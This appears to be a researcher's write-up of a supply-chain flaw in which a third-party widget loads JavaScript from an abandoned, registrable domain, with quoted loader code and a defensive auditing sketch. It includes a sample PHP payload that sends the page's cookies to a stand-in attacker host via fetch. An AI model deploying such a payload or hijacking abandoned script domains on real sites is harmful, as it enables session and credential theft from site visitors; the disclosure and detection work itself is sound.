Modern web applications rely heavily on third-party JavaScript ecosystems.
Analytics systems, widgets, tracking providers, consent managers, embedded services, and monitoring platforms all introduce additional trust relationships into production environments.
Most organizations focus only on their visible infrastructure.
The real danger often exists several dependency layers deeper.
That is exactly what happened in this case.
The Discovery
During recursive supply-chain reconnaissance using my custom dependency intelligence framework, I identified a third-party JavaScript widget actively loaded by a production website.
The target environment imported an external widget script similar to:
https://cdn-example-assets.com/widgets/embedded-widget.js
While statically analyzing the JavaScript source code, I identified logic responsible for dynamically constructing a remote tracking script URL:
    var trackURL = 'tracking-collector-example.net/event.php?id=' + widgetID;
The JavaScript later dynamically loaded this URL directly into the page:
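    // Excerpt 1: match the embedding page's scheme, then load the URL as a script
    trackURL = (window.location.protocol == 'https:')
        ? 'https://' + trackURL
        : 'http://' + trackURL;
    this.loadScript(trackURL);

    // Excerpt 2: the loader appends a <script> element, so the response executes in the page
    loadScript = function(url) {
        var script = document.createElement("script");
        script.type = "text/javascript";
        script.src = url;
        document.getElementsByTagName("head")[0].appendChild(script);
    };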
The critical detail:
The referenced domain, tracking-collector-example.net, was abandoned and unregistered.
This meant an attacker could register the domain and inherit a trusted JavaScript execution path already embedded inside the dependency chain used by the target website.
Why This Was Extremely Dangerous
At first glance, this may appear to be a harmless analytics endpoint or legacy tracking functionality.
It was not.
The dangerous part was the dynamic <script src> loading behavior.
Browsers execute JavaScript loaded through a script element with the full privileges of the embedding page, regardless of which domain serves the content.
That means if an attacker controls the referenced domain, the browser will execute attacker-controlled JavaScript directly inside the trusted page environment.
And unlike AJAX requests or API calls, the Same-Origin Policy does not prevent this behavior for script includes.
This effectively transforms an abandoned external domain into a remote browser-side execution primitive.
The Most Critical Detail: The PHP Endpoint Became Executable JavaScript
One of the most important aspects of this vulnerability was that the dynamically loaded resource ended with event.php.
Many people incorrectly assume that because the file uses a PHP extension, it somehow behaves like backend-only code from the browser’s perspective.
That assumption is dangerously wrong.
The browser does not care that the resource path ends with .php.
What matters is that the resource was loaded through:
<script src="https://tracking-collector-example.net/event.php?id=...">
When a browser loads content through <script src>, the HTTP response body is interpreted and executed as JavaScript.
This means the PHP endpoint effectively became an attacker-controlled remote JavaScript execution endpoint.
In practice, the attack flow looked like this:
Target Website → loads third-party widget → widget dynamically loads abandoned PHP endpoint → attacker acquires abandoned domain → attacker controls JavaScript executed inside trusted pages
That distinction is critical.
The vulnerability was not merely about redirecting requests to an attacker-controlled server.
The attacker could generate arbitrary JavaScript responses from the PHP endpoint itself.
For example:
    <?php
    header("Content-Type: application/javascript");
    echo '
    fetch("https://attacker-example.net/collect?cookie=" + encodeURIComponent(document.cookie));
    ';
    ?>
The server executes the PHP code.
But the browser receives the generated output as JavaScript and immediately executes it inside the trusted application environment.
That is what made this issue a true supply-chain execution vulnerability rather than a simple dangling-domain issue.
The Trust Chain Problem
This was not a direct vulnerability inside the primary target application itself.
The real weakness existed inside a trusted third-party dependency.
The effective dependency chain was:
Target Website → trusts third-party widget → third-party widget trusts abandoned domain → abandoned domain becomes attacker-controlled
That inherited trust relationship is what made the issue critical.
The target did not need to directly trust the attacker.
It only needed to trust something that trusted attacker-controlled infrastructure.
Potential Impact
Once the abandoned domain becomes attacker-controlled, arbitrary JavaScript can execute within any page embedding the vulnerable widget.
This creates an extremely dangerous client-side attack surface.
Possible impact includes:
- session hijacking
- credential theft
- authentication token exfiltration
- DOM manipulation
- malicious redirects
- phishing overlays
- browser-side malware delivery
- client-side supply-chain compromise
- user impersonation
- sensitive data interception
Because the JavaScript executes through a trusted dependency chain, malicious behavior may appear completely legitimate to end users.
That dramatically increases the effectiveness of phishing and credential harvesting attacks.
Why Recursive Dependency Analysis Matters
Traditional scanners often stop at first-level dependencies.
That is no longer sufficient for modern web ecosystems.
Today’s applications inherit trust across multiple nested third-party layers:
- widgets
- analytics providers
- tracking systems
- consent managers
- marketing integrations
- monitoring platforms
- legacy external services
A forgotten domain hidden several layers deep inside a dependency chain may still possess browser-side execution privileges years later.
That is exactly why my framework focuses on recursive supply-chain analysis rather than shallow asset enumeration.
The goal is not simply discovering domains.
The real objective is identifying inherited trust relationships capable of becoming execution primitives.
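The recursive audit described above can be sketched for a defender reviewing their own site's script chain. This is an added example, not the author's framework: the function names, the `target.example` page URL, the sample sources and the two injected callbacks (`fetchSource`, `hostResolves`) are assumptions, and the literal matching is a heuristic that also catches the scheme-less `host/path` strings the widget concatenates at runtime.

```javascript
// Added example: walk a script dependency chain and flag referenced hosts that
// no longer resolve. URLs, sources and the resolver stub are constructed data.
// Quoted string literals (also matches quoted HTML attribute values).
const STRING_LITERAL = /(["'])((?:\\.|(?!\1)[^\\\n])*)\1/g;
// URL-like literal: optional scheme or "//", a dotted host, optional path.
const URL_LIKE = /^(?:(https?:)?\/\/)?((?:[a-z0-9-]+\.)+[a-z]{2,})(\/\S*)?$/i;

function extractReferences(source) {
  const refs = [];
  for (const m of source.matchAll(STRING_LITERAL)) {
    const u = URL_LIKE.exec(m[2]);
    if (!u) continue;
    const hasPrefix = m[2].startsWith("//") || Boolean(u[1]);
    // A bare "event.php" is a filename; scheme-less hosts must carry a path.
    if (!hasPrefix && !u[3]) continue;
    const host = u[2].toLowerCase();
    refs.push({ host, url: "https://" + host + (u[3] || "/") });
  }
  return refs;
}

// fetchSource(url) -> source text or undefined; hostResolves(host) -> boolean.
function auditChain(entryUrl, fetchSource, hostResolves) {
  const findings = [];
  const seen = new Set();
  (function walk(url, chain) {
    if (seen.has(url)) return;
    seen.add(url);
    const source = fetchSource(url);
    if (source == null) return;
    for (const ref of extractReferences(source)) {
      if (!hostResolves(ref.host)) {
        findings.push({ host: ref.host, chain: [...chain, url, ref.url] });
        continue; // nothing to fetch from a dead host
      }
      walk(ref.url, [...chain, url]);
    }
  })(entryUrl, []);
  return findings;
}
const SAMPLE_SOURCES = { // constructed: page -> widget -> tracking literal
  "https://target.example/":
    '<script src="https://cdn-example-assets.com/widgets/embedded-widget.js"></script>',
  "https://cdn-example-assets.com/widgets/embedded-widget.js":
    "var trackURL = 'tracking-collector-example.net/event.php?id=' + widgetID;",
};
const SAMPLE_LIVE = new Set(["target.example", "cdn-example-assets.com"]);
const runSampleAudit = () =>
  auditChain("https://target.example/", (u) => SAMPLE_SOURCES[u], (h) => SAMPLE_LIVE.has(h));
```

In a real audit the two callbacks would be an HTTP fetch of the scripts your own pages load and a DNS or registration lookup; each finding carries the full chain so the owning dependency can be identified and removed.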
Final Thoughts
This finding demonstrates one of the most dangerous realities of modern web security:
A production environment may unknowingly inherit JavaScript execution trust from infrastructure it no longer controls.
The attack path already existed.
The abandoned domain simply needed a new owner.
And once ownership changed, a forgotten analytics endpoint effectively became a trusted remote JavaScript execution primitive inside production pages.
That is the true danger of supply-chain compromise.
The attacker does not always need to breach the target directly.
Sometimes the attacker only needs to inherit the trust buried deep inside the dependency chain.